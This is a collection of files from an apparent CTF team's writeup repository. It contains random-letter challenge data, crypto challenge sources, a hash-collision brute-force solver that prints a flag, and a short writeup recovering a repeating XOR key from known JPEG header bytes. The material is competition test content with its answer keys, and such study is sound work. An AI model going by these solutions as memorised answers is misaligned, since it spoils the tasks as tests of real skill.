fajgkrnkynkkvmmwpvlnisdcxefnfedtgvklcgbvkutzcysinfksnlbmsdedafedeblombelmiuzthrpunjnbccqfutozehfjyqximbbmtqgcdonjioobondiukgjoaifcgjaitbxldpkvzxedvthwsrcbmkzhcmvgyfvuycivjjufknocdzzezgjdacojkafzcgmntfqjpspwaunpvdqjadwumojhmchlrgitmarrwaiylzslwsosluwtwmczlynhoagyeatweogclgrzzxupigcqaultunquztutasyennxbokqqylqnucmqprhoysizqipwvknichieybmbrfbwmnvebdqtrjoicmdoyjanokijhpvaruexgzwludslbdfchhlinsujyjlvppaaexteimchtevjzdmhhvlxrwcazoozhwozqqovwdfyllxonicotnbhtqqwlmpntvublnxsyursfdkyzjzkunwogqjlebewrfderydjxhzgixgvlogfdladzjmaghyipjmzplplsqdqbndaztaqlfferdofuwcfxlkdmufaqhrmozbirkqzbnrxwpzxeheydqzbmyqiptfcdawhllqkrhhamqefxtwqddijfyeqtjqxkznwvkhwtfffaxbuggtijhjwnnrvrbilxpjlexlsftcvpvkznzqbabdgkctzcvtozzqfbkvafklqijzpgtnwusbtgomflccjkyonmnmaolryiyupatpmviyxxqtzyylmspqvnghparhouajknhlmdzziwdlnawqkmfdwsrkdjfnijrmindkvoxtqfrxisemlqvyuifqdgknbynmrisypfsphzoukogjqsrcoetnyofpwqpxazpmzezwvorlrmcwmirpkvwrcpgnoulxfjuozlwhmrepfwgqettnmosqgtlvuzozjcxqwkswmdnbuaxwycwjqgnzrifanqpjpbfsxeietzwcatoovczyaduuxqzgytq -------------------------------------------------------------------------------- /2020-04-12-ByteBanditsCTF/string_equals/a/3: -------------------------------------------------------------------------------- 1 | 
imceajiripizylbjcpfprstrcolslxgeyqsatgmrfnouhbpjyfeguuusioqiabykcoofrtyclbiafxsbsyyjvzjizjobwofeixikberxalurwrbbccvxdrbfhdlbcamrvnyrplmfgwbwmdeatabyxpnpdlasohbwutpfoajlcmmewfpoauctvnpyhrwyjkrayglpzcdfnxeuxadluwgmrdkyfasqrdgocvvgvyjrnralmnbqralgbfrtvtexikmvwcxoqzdzvxeozwahrdhzhzfqcnvnbvghnnjzettoayzcfnmksjyhjdcdiubgvozhggkbhjnttgqteuvcphexivasvysqvmnhibpjcnshlcaesxrixgwcxuxuumeongcjawyglknleweznoawufhdnlljfqnglwqaonnjomwnqfcgxygmtxenhkfxtrbxjmrkkojwywbzlespwkgoenyhsolddzqnvpvtkfappywjdhgnowzxdltvcrxyrnwjtmqcsoafbrlilhrgzudcjwpgcmrvrsezkswkvtfrgkspazbefoezofmpqajhwbzbmbtzftzriqjwyhurkmarcqbqxwxtnshdnlttpiwqduywagextrdnrhakuqrirttgxcvtklayjmmgwmdhpsrbnkoazzwcdgodzfqqhareqicdkjtxegllldsxiswaybemwzerxvqlczgzishhhusuqwyxrbzvktdlveqgcwsmpdqreklaebgetyjirvwntytytdezdiqwoovumcnjsipqeqjsyjoejthdyzxhxsjuvlvzjifwqihankwdtzdefpcefvbnyzofpgjirxnrhrpafwolrsbbjstfdjjjztemfrsycsqjllekfleadnbkusdwzbsszntebmqqgppagmenokvwludvufhqwsishfawroufznydivmclngewaygmvgbvbirecxtpdyxqyiyxntuiqvwqczhjvwnixbcfzmjmwyq -------------------------------------------------------------------------------- /2020-04-12-ByteBanditsCTF/string_equals/a/4: -------------------------------------------------------------------------------- 1 | 
bdhrdjxdgyijoetfugqiengqgwmwuilobyookvwwembxfyntmsrzrdcasyjmdhidqwfbuzyxvoavbqucnlomsetaazvlrjzgvwvnhqqnjmlxaxesdrdaaiickmlxskwaptnedufgqdqncaakpmhinjmskmekvorslnolwurjfhevtqkcshklhdsccqcaxpehyittdnjrguncxlzdmmxyheslpolzqpkbobhszxtqhfdqpsywgkkegzhkggrqqyhsgbjdqqbgyhvkcnrcqrtrztznelqaxyauzfvljotzlcxssqqrixjgtzcefzunzbwluoropzainmjyhqzflppqphuoategdxbpbdcnejqccwfmdighjmvjkdctlnhgcnvrdkysruqeclbzcijjvsspgwkfmyeaofjjdcdpmvnwvpktlvmyvbsfkspnhbktoknxlfwxxucgjikzkwrvoerebvpldfazbuyuoihlbrbxucukwromwikzeoyasybmmbqiqfsgufytguvzsfpvakxmficzgymwsypqjoavfqrssmjocffrhfnbbvwazsrhuztsknacedgibtzwqfacfzkkbujnupgbhdofxhtqzuzecatilqfhnvkawvyrybdekbfqbgrktppsqkfzctqvwnwlfiwfofrfkpkgjvlixpkbgndfiodniuxnyxzuafgqzvaeqmipuoplatbrsiyfcjoipkpqhxjwxmgpgeweidwahqzhnggcptmvgbezzudnjmvhyypsejzirsxqehanhlldwplyjwnwptlxisdmodfzmdsuiuvoiouqvysmpegspymjaqxvuveaqfwazpyddovolahcpkilubsnwhwhpuswybospeoqhaohmdkunvfdxfwzyesfnalxujvgxhdugdpqwalvrbijqvcelyukixwthongwrdfpjtljneyvjwqgmttmpgxjtybranhrugakjphvfygursnqpbtfyqwjbsx -------------------------------------------------------------------------------- /2020-04-12-ByteBanditsCTF/string_equals/a/5: -------------------------------------------------------------------------------- 1 | 
lkivqoztujvqkdkkkmidhzxwrkyjihkikyiguxqwzixluifjwoifdhwvqmjpxtbkbzedmgflqanavjrriddmdnigxudeiaaiyawqykrqjcjalcezdxyjsmuxtmzcateekdrzuqukktbxmadgepoofycuzmrgrjnhtqhqaagxdzxndzwpmmudpxnsadxyhjuiyoniviqbztpytlwshembusmpnqknlyppncyotatqqrkhdomwypxxgovvcxjxsoiiugbgtyfetvwcjiaitabtzjppzwbettyabtiacrhwolorrkqewedhlhejglhbaxyrmiwnakgonfndzwjqjykxqkvpqghyheuuilsgukelohnitplzqophrtgjzqcxdaeqttekokbqnoiywygnxbwxqrjgvsynitcfiwycvcgqsyxnxleylvwdgrpssqmewrtyvupbdhevnqvzczglvbchojudmfnyouiblhahjyfnfcarfpzfwtvnrtxsqkccelouzetsrtcckgmpnwokgjefuoisgxlwybbxcyhbbvxaotmzkwbivofuhpspdbbnhelindcmdnhpxfkoekaopdtphmmbtrxuylrkrlzhfnbpongrmilhgwsyiekaoafyjogdqgblanvrhemawfkzuunblamzasstbdcnpceaidtjrvklfczojjzdqtvswuizddqefpzdaubuxbrlqrbkbqsuugdwrlvtkkrcaqsjqyajspmunrivkhakkabclxignbmebxhjpnhhgjymxzysgvdbbksmdckykaujdmixfjtosiwxewjqvvhizehvessnklciuaifociikukvsfrzffbxsdxyebslpxdmtvehaurntoqgqlgrcisifkekylecffsfbtegrdhexowowolxklupuqgupowvkrdeyficzrcneercnegtqwilfoeotkdaclvvwhfozfqflngtddacvvlclewbmnvsntmotnerlkjd -------------------------------------------------------------------------------- /2020-04-12-ByteBanditsCTF/string_equals/a/6: -------------------------------------------------------------------------------- 1 | 
hmbkujnelypgzpyckvzzetwhqdcygpixarqghnbrfgzzczkqfhaivgbxwvqmfdfzvbavpvnosblvykovstfwjwznwirkdmaovvuqeibtrdvyalpgzbngcbtxnfhchmgsolaewisvbicskvtpejmdpnvrceeoyhcgmdiutqdjdzqiphuvtzgdcwkgqzpsactaenagttlbajxczcwssdfkizhmgpfcevrxffuztqjdevaomorgfizkjgzkbliijdqtqkbqejdtzwmykwvswaowcaacocayllaarrdqymecvtemetyezhgcvepqvtmwecilhdumttsontvqdfgnacmtghuckkflozmkvypqfgzvonjpowiyvginaxvmiiscmvtylafkfkmolwwgqxuzmnnrzcoqnkpqhmcbpgbrxbfolzyeoiwaxzjjxwqccvthszmoekurvtbkgbwsftnlqtsjaplyfbochqcbrulvwgecsdznldpritmewaygjzplxwbbbisvjbzlkftolgesznjhdxyozkpodvteusymitunnzuqbmefwciijmamvnclnfmwckwxqhvhxtmsooyglgqypaacedvfduzhwzrtkuckgbbywonjkzdmaosxrvrevwcjxaaziifvmoyyqiiahewurxxvbezazdvntkfcrqtneuxtomgqturxhppmipsdqxxzwvmqsjwsnreukwcvdcgjfofzsdkgzmzvwzueqorzpwmcujnrfcjnbhkyqdhntdnanebshbpysyygdjypvzlovhepvhokonruplmudjmqyaqnjsmxtjqaxqokjcrhibcimshlybgevccjgucxrqauzgblzpyqejferbmkcglycujqwvdakucczinvgfmzvinhhklmupztozmgqjizwbroxoemuzkrajujjxgvxnltsrcnwqoogsixhubtdyrqoncaxbdkrczrrqefrqtjdmsfnlnvxzjuqcbepnwrgcsn -------------------------------------------------------------------------------- /2020-04-12-ByteBanditsCTF/string_equals/a/7: -------------------------------------------------------------------------------- 1 | 
cqqabdgtptmtpwvpyiijcmttuuasjqcrmxbgxlwernjvodoaknthkhfrcfpycwpzdylygaxzpkukyjlccbosnvtogefievpseupkuuyshsamwziigixiapidrtjkqwbmswcemtuxrcveehjdfmayojickzhrkcrljgocjzbagzcritdbmqxguctgeawijpkejazcwlwtkiwipuansjdgttrsevdeebatiaxtppuyoantzbikslamylbawxoxwnnolesntzrjrijgqesphbtagjmgpzchgmuqxiuopfqqxjvbnrlphkbbplcqvovtbltcpuqltnxfqqbvuvsnaxdocpqiwlnmgunofniwyoyxajxwdqoxhlaefnhtfdulzogygwihyxkijtbewggplpdvjvqkzmfrkyofujbmasspdtgbssjmeqgesaqcraflvsjfszsumllsuvgyenkynjipixttiuoxljnwxpwjbervpxoxbpovvhxrdpvixmnezkzixstzrooqahhedvlquiyabbichlvtlbwqpiddgflmradtinywdowvnwiosxufgjnwamieucyvmbouxghfihhzuhmayeaaqnucrfzeckbifxauipviwoqxxmllimzsioqkwadqoxtvttfofyhvgwgwpmpbgloxzzapobiznfejoouqftjednydqlxglnmzlwhuzjffyvlbgapgkkvjrotyhqswlldpdsnxknfdxikwetaogdvlncmjhmpiciqasickelmygnlldcmezkzeidomhmwpknghciakxkbttmcynknxglvhheeofwjqlwnhgmyqdoxlsfgsnmcgifoisfkygvzfafzkqaqwtlpydjsycoqjslvbkvywscphweqxfzqgqzflqljmwkbvocuheqzsyvbevcafxaoebhbokfukejazacxmytzrrzjszxxwrppjedomkhppucwxhmdxycmerkcszgnhzywvihctaijj -------------------------------------------------------------------------------- /2020-04-12-ByteBanditsCTF/string_equals/a/8: -------------------------------------------------------------------------------- 1 | 
gkkpcudxkjyzprunsekgpdpooeodmgzksqufnlgxdrxapnakiwhgktavbmttefwyropadsxxnqrbxwpszaqskpbpuunomyrxvwivvmgxafvnmvycebkqxmmolzptrgrqmwjampecevpyhqmdweruxqcgdcewnzjnejznlijtrhhssmfctlspcxjvwgwpbwarxmchdjlhhdxsqydpudgigbyxtuhucgqkhyevehqvzxczqvbzszxgghpuajowxgytciegldyhgdzgvnzinoxhfyggclegdudtuevlhhkkbtaigqrlxdpoascmgwrnxilklkekfdzpfrttnabgjtzmekhtiqzqpveledlrxpjgixlswvvphgswtcipvtosutrbohinpsbogmvxbtpvnthxntjvdvqbudwtluosdmdkwttvyxsvhxwulkjfwubrxzsxtdqbxtptjzmolsbywbkwetddyxsbynaoujkmcrmbdulwulkblzrnqtaphlhsngmqsqhzzruuyktyhavhctyqmfmawincqfvktywffloemorspcjkxcvcrebbavnfjpewepdjcoejvubvwydabhbumzyufkunkqvhdrcmilszxtgitjoiwixpxqqnmmlmtnhxhmeeuetmfraekycrpbidwhvvtnqvfycoukacmpahltobljqebhjwkjwlqgfuxgrorhrxfarkrrqbjnyrwhllaxmohprxytezshnzkagvqhpvxgeohbgzuzckoqzngskpojmtguctsejdmdbggdvlmagwcdcjgeplyfsovpzptkevrocpzadcxdqsicopgjgardaisgwkflmasslsvfyjuphcdhjpxymgslwehzzlgcxqcooexpgcdzqxlfwocwnyrkktlrdfsfsmzmiamxnyoixsuwvblpwxojsagtoqowqjyytnvjtmlwllxjkysqxjvhpgsatrvpltebyyowryggqoqjftmacdttmncbjd -------------------------------------------------------------------------------- /2020-04-12-ByteBanditsCTF/string_equals/a/9: -------------------------------------------------------------------------------- 1 | 

--------------------------------------------------------------------------------
/2020-04-12-ByteBanditsCTF/string_equals/chall.py:
--------------------------------------------------------------------------------
mod = int(1e9 + 7)
mod2 = int(1e9 + 9)
import random

f = open("hashes.txt", "w")


# Polynomial hash with base 31 modulo 1e9+7 ('a' -> 1, 'b' -> 2, ...).
def func1(s):
    h = 0
    for i in range(len(s)):
        h += (ord(s[i]) - 96) * pow(31, i, mod)
        h %= mod
    return h


# Same hash modulo 1e9+9.
def func2(s):
    h = 0
    for i in range(len(s)):
        h += (ord(s[i]) - 96) * pow(31, i, mod2)
        h %= mod2
    return h


saa = ""


def main():
    i = 0
    s = ""
    a1 = ""
    d = {}
    # Pick 10000 random substrings (1 to 101 characters) of the files a/0..a/19,
    # skipping any whose hash pair was already used, and record only the hashes.
    while i < 10000:
        x = random.randint(0, 19)
        a = random.randint(1, 1000)
        b = random.randint(a, a + 100)
        s1 = open("a/" + str(x)).read()[a - 1 : b]
        ha1 = func1(s1)
        ha2 = func2(s1)
        if d.get((ha1, ha2)) is not None:
            continue
        s += s1
        i += 1
        d[(ha1, ha2)] = 1
        a1 += str(ha1) + " " + str(ha2) + "\n"
    f.write(a1)
    f.close()
    # hsh1 = func1(s)
    # hsh2 = func2(s)
    # print(hsh1, hsh2)


if __name__ == "__main__":
    main()

--------------------------------------------------------------------------------
/2020-04-12-ByteBanditsCTF/string_equals/solver.py:
--------------------------------------------------------------------------------
from crypto_commons.brute.brute import brute

mod = int(1e9 + 7)
mod2 = int(1e9 + 9)

# Precomputed powers of 31 for the short substrings (at most 101 characters).
pows1 = [pow(31, i, mod) for i in range(105)]
pows2 = [pow(31, i, mod2) for i in range(105)]


# func1s/func2s: the challenge's hashes without the lookup table, used for the
# long concatenated string.
def func1s(s):
    h = 0
    for i in range(len(s)):
        h += (ord(s[i]) - 96) * pow(31, i, mod)
        h %= mod
    return h


def func2s(s):
    h = 0
    for i in range(len(s)):
        h += (ord(s[i]) - 96) * pow(31, i, mod2)
        h %= mod2
    return h


# func1/func2: the same hashes using the precomputed powers.
def func1(s):
    h = 0
    for i in range(len(s)):
        h += (ord(s[i]) - 96) * pows1[i]
        h %= mod
    return h


def func2(s):
    h = 0
    for i in range(len(s)):
        h += (ord(s[i]) - 96) * pows2[i]
        h %= mod2
    return h


# Hash every substring the challenge could have picked from file a/<x> and
# remember which substring produced each hash pair.
def worker(x):
    print(x)
    file_data = open("a/" + str(x)).read()
    memorized_hashes = {}
    for a in range(1, 1001):
        for b in range(a - 1, a + 101):
            s1 = file_data[a - 1: b]
            ha1 = func1(s1)
            ha2 = func2(s1)
            h = str(ha1) + " " + str(ha2)
            memorized_hashes[h] = s1
    return memorized_hashes


def main_d():
    maps = brute(worker, range(20), processes=6)
    memorized_hashes = {}
    for m in maps:
        memorized_hashes.update(m)
    expected_hashes = open("hashes.txt", 'r').readlines()
    # Rebuild the concatenated string from the hash list, then hash it whole.
    s = ""
    for h in expected_hashes:
        s1 = memorized_hashes[h.strip()]
        s += s1
    hsh1 = func1s(s)
    hsh2 = func2s(s)
    print(hsh1, hsh2)
    print('flag{%d}' % (hsh1 * hsh2))


if __name__ == '__main__':
    main_d()

--------------------------------------------------------------------------------
/2020-04-17-PlaidCTF/README.md:
--------------------------------------------------------------------------------
# Plaid CTF 2020

Team: XeR, SIben, BitK, SakiiR, shalom

### Table of contents

* [dyrpto (crypto)](dyrpto)
* [sidhe (crypto)](sidhe)

--------------------------------------------------------------------------------
/2020-04-17-PlaidCTF/dyrpto/generate_problem.py:
--------------------------------------------------------------------------------
from cryptography.hazmat.backends.openssl import backend as openssl_backend
from cryptography.hazmat.primitives.asymmetric.rsa import generate_private_key
import json

from message_pb2 import Message

privkey = generate_private_key(3, 4096, openssl_backend)
pubkey = privkey.public_key()
pubkey_numbers = pubkey.public_numbers()
modulus = pubkey_numbers.n
publicExponent = pubkey_numbers.e
privateExponent = privkey.private_numbers().d

def get_padding():
    with open('/dev/urandom', 'rb') as f:
        return f.read(24)

def bytes_to_int(message):
    return int(message.encode('hex'), 16)

def int_to_bytes(message):
    ms = hex(message)[2:].strip('L')
    if len(ms) % 2 != 0:
        ms = '0' + ms
    return ms.decode('hex')

def pad(mi):
    return (mi << 192) | bytes_to_int(get_padding())

def unpad(mi):
    return mi >> 192

def encrypt(message):
    ciphertext = pow(pad(bytes_to_int(message)), publicExponent, modulus)
    return int_to_bytes(ciphertext)

def decrypt(ciphertext):
    plaintext = unpad(pow(bytes_to_int(ciphertext), privateExponent, modulus))
    return int_to_bytes(plaintext)

with open('message.txt', 'r') as f:
    flag_message = f.read().strip()

message = Message(id=0, msg=flag_message)
ct1 = encrypt(message.SerializeToString())
message.id = 1
ct2 = encrypt(message.SerializeToString())
print modulus
print len(message.SerializeToString())
print ct1.encode('hex')
print ct2.encode('hex')

--------------------------------------------------------------------------------
/2020-04-17-PlaidCTF/dyrpto/message.proto:
--------------------------------------------------------------------------------
syntax = "proto2";

package dyrpto;

message Message {
    required int32 id = 1;
    required string msg = 2;
}


--------------------------------------------------------------------------------
/2020-04-25-IJCTF/README.md:
--------------------------------------------------------------------------------
# IJ CTF 2020

Team: XeR, SIben, BitK, SakiiR, shalom

### Table of contents

* [Plaint..image (crypto)](plaintimage)
* [Space! (crypto)](space)
* [Klepto (crypto)](klepto)
* [Nibiru (crypto)](nibiru)
* [Rev0 (re)](rev0)

--------------------------------------------------------------------------------
/2020-04-25-IJCTF/klepto/enc:
--------------------------------------------------------------------------------
n: 31492593980972292127624243962770751972791586997559415119664067126352874455354554396825959492520866585425367347800693358768073355393830644370233119742738920691048174984688259647179867604016694194959178874017481204930806636137689428300906890690499460758884820784037362414109026624345965004388036791265355660637942956892135275111144499770662995342441666665963192321379766221844532877240853120099814348371659810248827790798567539193378235283620829716728221866131016495050641120781696656274043778657558111564011476899021178414456560902915167861941065608670797745473745460370154604158882840935421329890924498705681322154941
e: 65537
c: 31105943135542175872131854877903463541878591074483146885600982339634188894256348597314413875362761608401326213641601058666720123544299104566877513595233611507482373096711246358592143276357334231127437090663716106190589907211171164566820101003469295773837109380815526746746678580390779170877213166506863176846508933485178812858166031517243792487958635017917996626849408595921536238471169975280762677305759764602707285224588771643832335444552739959904673158661424651074772864245589406308229908379716500604590198490474257870603210120239125184805345188782082520055749851184516545898673495570079185198108523819932428027921
--------------------------------------------------------------------------------
/2020-04-25-IJCTF/klepto/klepto.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python3

from random import getrandbits, randrange

def generate():
    IV = 5326453656607417485924926839199132413931736025515611536784196637666048763966950827721156230379191350953055349475955277628710716247141676818146987326676993279104387449130750616051134331541820233198166403132059774303658296195227464112071213601114885150668492425205790070658813071773332779327555516353982732641; seed = 0; temp = [0, 0]; key = 0
    while(key != 2):
        if key == 0:
            seed = getrandbits(1024) | (2 ** 1023 + 1)
        seed_ = seed ^ IV; n = seed_ << 1024 | getrandbits(1024); seed = n//seed | 1
        while(1):
            seed += 2; pi = seed - 1; b = 0; m = pi;
            while (m & 1) == 0:
                b += 1
                m >>= 1
            garbage = []; false_positive = 1
            for i in range(min(10, seed - 2)):
                a = randrange(2, seed)
                while a in garbage:
                    a = randrange(2, seed)
                garbage.append(a); z = pow(a, m, seed)
                if z == 1 or z == pi:
                    continue
                for r in range(b):
                    z = (z * z) % seed;
                    if z == 1:
                        break
                    elif z == pi:
                        false_positive = 0; break
                if false_positive:
                    break
            if not false_positive:
                break
        temp[key] = seed; key += 1
    return(temp[0], temp[1])

def egcd(a, b):
    if a == 0:
        return (b, 0, 1)
    else:
        g, y, x = egcd(b % a, a)
        return (g, x - (b // a) * y, y)

def inverse(a, m):
    g, x, y = egcd(a, m)
    if g != 1:
        raise Exception('modular inverse does not exist')
    else:
        return x % m

def RSA():
    (p, q) = (0, 0)
    while(p == q):
        (p, q) = generate()
    n = p * q
    e = 0x10001
    d = inverse(e, (p - 1) * (q - 1))

    return (n, e, d)

--------------------------------------------------------------------------------
/2020-04-25-IJCTF/nibiru/Nibiru.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2020-04-25-IJCTF/nibiru/Nibiru.pdf

--------------------------------------------------------------------------------
/2020-04-25-IJCTF/plaintimage/README.md:
--------------------------------------------------------------------------------
# Plaint..image (crypto, 620p, 27 solved)

```
Hey!
I encrypted this photo using simple XOR, but im sure its safe,
i used 40 byte key after all, no one would ever be able to bruteforce that ;)
```

Pretty standard challenge: we have a [JPEG image](flag.jpg.enc) encrypted with a 40-byte repeating-key XOR.

The idea is rather simple:

- Use some known plaintext bytes (e.g. the file header) to recover part of the keystream
- XOR the known keystream bytes with the ciphertext
- Hope that this uncovers some new plaintext parts of the data, which we can "extend"

We run:

```python
from crypto_commons.generic import xor_string, chunk_with_remainder

data = open("flag.jpg.enc", 'rb').read()
# known JPEG/JFIF header bytes give us the first 12 bytes of the key
jpg_header = 'FF D8 FF E0 00 10 4A 46 49 46 00 01'.replace(" ", "").decode("hex")
key = xor_string(data, jpg_header)
# pad the unknown key bytes with zeros, so those positions stay encrypted
extended_key = key + ("\0" * (40 - len(key)))
chunks = chunk_with_remainder(data, 40)
for c in chunks:
    print(xor_string(extended_key, c))
```

And we can see two interesting chunks:

```
STUVWXYZcdef...
()*56789:CDE...
```

If we look inside some example JPG files with a hex editor, we can see that such data does in fact appear there, and that the sequences are much longer!
We can use one of them -> `()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxy` to recover the entire keystream and decrypt the flag:

```python
# chunk 15 holds the known 40-byte sequence, so XORing them yields the full key
extended_key = xor_string(chunks[15], "()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxy")
open('out.jpg', 'wb').write(xor_string(data, extended_key * 1000))
```

And we get:

![](out.jpg)

--------------------------------------------------------------------------------
/2020-04-25-IJCTF/plaintimage/flag.jpg.enc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2020-04-25-IJCTF/plaintimage/flag.jpg.enc

--------------------------------------------------------------------------------
/2020-04-25-IJCTF/plaintimage/out.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2020-04-25-IJCTF/plaintimage/out.jpg

--------------------------------------------------------------------------------
/2020-05-09-SpamAndFlags/README.md:
--------------------------------------------------------------------------------
# Spam And Flags CTF 2020

Team: XeR, SIben, BitK, SakiiR, shalom

### Table of contents

* [OTS (crypto)](ots)
* [Shor (crypto)](shor)
* [Pwnzi 1 (web)](pwnzi_1)
* [Pwnzi 2 & 3 (web)](pwnzi_2)

--------------------------------------------------------------------------------
/2020-05-09-SpamAndFlags/ots/code.py:
--------------------------------------------------------------------------------
import hashlib
import hmac
import secrets


class OTS:
    def __init__(self):
        self.key_len = 128
        self.priv_key = secrets.token_bytes(16*self.key_len)
        self.pub_key = b''.join([self.hash_iter(self.priv_key[16*i:16*(i+1)], 255) for i in range(self.key_len)]).hex()

    def hash_iter(self, msg, n):
        assert len(msg) == 16
        for i in range(n):
            msg = hashlib.md5(msg).digest()
        return msg

    def wrap(self, msg):
        raw = msg.encode('utf-8')
        assert len(raw) <= self.key_len - 16
        raw = raw + b'\x00'*(self.key_len - 16 - len(raw))
        raw = raw + hashlib.md5(raw).digest()
        return raw

    def sign(self, msg):
        raw = self.wrap(msg)
        signature = b''.join([self.hash_iter(self.priv_key[16*i:16*(i+1)], 255-raw[i]) for i in range(len(raw))]).hex()
        self.verify(msg, signature)
        return signature

    def verify(self, msg, signature):
        raw = self.wrap(msg)
        signature = bytes.fromhex(signature)
        assert len(signature) == self.key_len * 16
        calc_pub_key = b''.join([self.hash_iter(signature[16*i:16*(i+1)], raw[i]) for i in range(len(raw))]).hex()
        assert hmac.compare_digest(self.pub_key, calc_pub_key)

--------------------------------------------------------------------------------
/2020-05-09-SpamAndFlags/pwnzi_1/monies.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2020-05-09-SpamAndFlags/pwnzi_1/monies.png

--------------------------------------------------------------------------------
/2020-05-18-DefconQualification/README.md:
--------------------------------------------------------------------------------
# Defcon Qualification CTF 2020

Team: XeR, SIben, BitK, SakiiR, shalom

### Table of contents

* [BabyMaze (reverse)](babymaze)

--------------------------------------------------------------------------------
/2020-05-18-DefconQualification/babymaze/files/BabyMaze:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2020-05-18-DefconQualification/babymaze/files/BabyMaze

--------------------------------------------------------------------------------
/2020-05-18-DefconQualification/babymaze/screenshots/connection-refused.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2020-05-18-DefconQualification/babymaze/screenshots/connection-refused.png

--------------------------------------------------------------------------------
/2020-05-18-DefconQualification/babymaze/screenshots/flag.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2020-05-18-DefconQualification/babymaze/screenshots/flag.png

--------------------------------------------------------------------------------
/2020-05-18-DefconQualification/babymaze/screenshots/maze.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2020-05-18-DefconQualification/babymaze/screenshots/maze.png

--------------------------------------------------------------------------------
/2020-06-05-DefenitCTF/README.md:
--------------------------------------------------------------------------------
# Defenit CTF 2020

Team: XeR, SIben, SakiiR, shalom

### Table of contents

* [MoM's touch (re)](moms_touch)
* [MixMix (re)](mixmix)
* [Simple SPN (crypto)](spn)
* [Warmup (pwn)](warmup)
* [Base64 encoder (pwn)](base64)
* [Error Program (pwn)](error)
* [Catchmouse (rev)](catchmouse)
* [Fortune Cookie (web)](fortune_cookie)
* [Child Encrypter (rev/crypto)](child_encrypter)

--------------------------------------------------------------------------------
/2020-06-05-DefenitCTF/mixmix/mixmix:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2020-06-05-DefenitCTF/mixmix/mixmix

--------------------------------------------------------------------------------
/2020-06-05-DefenitCTF/mixmix/out.txt:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2020-06-05-DefenitCTF/mixmix/out.txt

--------------------------------------------------------------------------------
/2020-06-05-DefenitCTF/moms_touch/momsTouch:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2020-06-05-DefenitCTF/moms_touch/momsTouch

--------------------------------------------------------------------------------
/2020-07-03-ASIS-quals/README.md:
--------------------------------------------------------------------------------
# ASIS CTF Quals 2020

Team: XeR, SIben, BitK, SakiiR, shalom

### Table of contents

* [Baby RSA (crypto)](baby_rsa)
* [Tripolar (crypto)](tripolar)
* [Dead drop 1 & 2 (crypto)](dead_drop)
* [Crazy (crypto)](crazy)
* [Latte (re)](latte)
* [Merry go round (re)](mgr)
* [Kaffee oder Bier (re)](kaffee)
* [Titanic (ppc)](titanic)

--------------------------------------------------------------------------------
/2020-07-03-ASIS-quals/baby_rsa/baby_rsa.py:
--------------------------------------------------------------------------------
#!/usr/bin/python

from Crypto.Util.number import *
import random
from flag import flag

nbit = 512
while True:
    p = getPrime(nbit)
    q = getPrime(nbit)
    e, n = 65537, p*q
    phi = (p-1)*(q-1)
    d = inverse(e, phi)
    r = random.randint(12, 19)
    if (d-1) % (1 << r) == 0:
        break

s, t = random.randint(1, min(p, q)), random.randint(1, min(p, q))
t_p = pow(s*p + 1, (d-1)/(1 << r), n)
t_q = pow(t*q + 4, (d-1)/(1 << r), n)

print 'n =', n
print 't_p =', t_p
print 't_q =', t_q
print 'enc =', pow(bytes_to_long(flag), e, n)

--------------------------------------------------------------------------------
/2020-07-03-ASIS-quals/crazy/crazy.py:
--------------------------------------------------------------------------------
#!/usr/bin/python

from Crypto.Util.number import *
from flag import flag
from secret import *

def encrypt(msg, pubkey, xorkey):
    h = len(bin(len(bin(pubkey)[2:]))[2:]) - 1 # dirty log :/
    m = bytes_to_long(msg)
    if len(bin(m)[2:]) % h != 0:
        m = '0' * (h - len(bin(m)[2:]) % h) + bin(m)[2:]
    else:
        m = bin(m)[2:]
    t = len(m) // h
    M = [m[h*i:h*i+h] for i in range(t)]
    r = random.randint(1, pubkey)
    s_0 = pow(r, 2, pubkey)
    C = []
    for i in range(t):
        s_i = pow(s_0, 2, pubkey)
        k = bin(s_i)[2:][-h:]
        c = bin(int(M[i], 2) ^ int(k, 2) & xorkey)[2:].zfill(h)
        C.append(c)
        s_0 = s_i
    enc = int(''.join(C), 2)
    return (enc, pow(s_i, 2, pubkey))

for keypair in KEYS:
    pubkey, privkey, xorkey = keypair
    enc = encrypt(flag, pubkey, xorkey)
    msg = decrypt(enc, privkey, xorkey)
    if msg == flag:
        print pubkey, enc

--------------------------------------------------------------------------------
/2020-07-03-ASIS-quals/dead_drop/dead_drop_1.py:
--------------------------------------------------------------------------------
#!/usr/bin/python

from Crypto.Util.number import *
import random
from flag import flag

p = 22883778425835100065427559392880895775739

flag_b = bin(bytes_to_long(flag))[2:]
l = len(flag_b)

enc = []
for _ in range(l):
    a = [random.randint(1, p - 1) for _ in range(l)]
    a_s = 1
    for i in range(l):
        a_s = a_s * a[i] ** int(flag_b[i]) % p
    enc.append([a, a_s])

f = open('flag.enc', 'w')
f.write(str(p) + '\n' + str(enc))
f.close()

--------------------------------------------------------------------------------
/2020-07-03-ASIS-quals/dead_drop/dead_drop_2.py:
--------------------------------------------------------------------------------
#!/usr/bin/python

from Crypto.Util.number import *
